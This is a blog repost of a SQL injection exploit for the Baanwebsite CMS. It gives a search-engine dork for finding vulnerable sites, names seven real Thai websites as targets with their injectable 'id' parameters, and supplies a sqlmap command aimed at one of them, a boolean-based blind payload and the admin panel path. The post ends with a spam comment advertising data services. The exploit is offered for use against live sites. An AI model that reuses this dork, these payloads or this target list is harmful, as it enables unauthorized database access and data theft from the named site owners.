Bugs Exploit Baanwebsite Sql İnjection Vulnerability tested on BackBox Linux


Information Exploit

[+] Exploit Title: Baanwebsite Sql İnjection Vulnerability
[+] Author : Cxsecurity.com and Magelang1337
[+] Dork : inurl:/php.?id= "Powered by บ้านเว็บไซต์"
[+] Tested on : BackBox 5.1, Chrome

On Target :
- http://www.onlinesolution.co.th/news/view.php?id=17[inject]
- http://steelline.co.th/product/view.php?prod_id=78[inject]
- http://www.zhanbua.com/product/view.php?id=122[inject]
- http://www.smartparkthailand.com/activities/view.php?id=9[inject]
- http://steelline.co.th/product/view.php?prod_id=8[inject]
- http://www.nyexpert87.com/products/view.php?id=32[inject]
- http://www.shizconfa.co.th/portfolio/view.php?id=4[inject]

[+] SQLMAP Poc :
sqlmap -u "http://www.onlinesolution.co.th/news/view.php?id=17" --dbs

[+] Poc SQL Injection :
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9007=9007 AND 'pOJG'='pOJG
[+] Poc local Admin : /admin

Sumber Bugs Exploit : [https://cxsecurity.com/issue/WLB-2018050129]

Video tutorial


good luck.. and hopefully useful...
Previous
Next Post »

1 komentar:

Click here for komentar
PiLoggroup
admin
April 17, 2019 at 2:03 AM ×

Nice post....Thanks for sharing the article....
We are providing the best master data services around the world....visit our site for more information....
master data management in sap
mdom
data cleansing tools
Master Data Governance
Data Cleansing Services
data classification tools
Master Data Management Solutions
data transformation service
Material Master Data Management
Master Data Dictionary

Congrats bro PiLoggroup you got PERTAMAX...! hehehehe...
Reply
avatar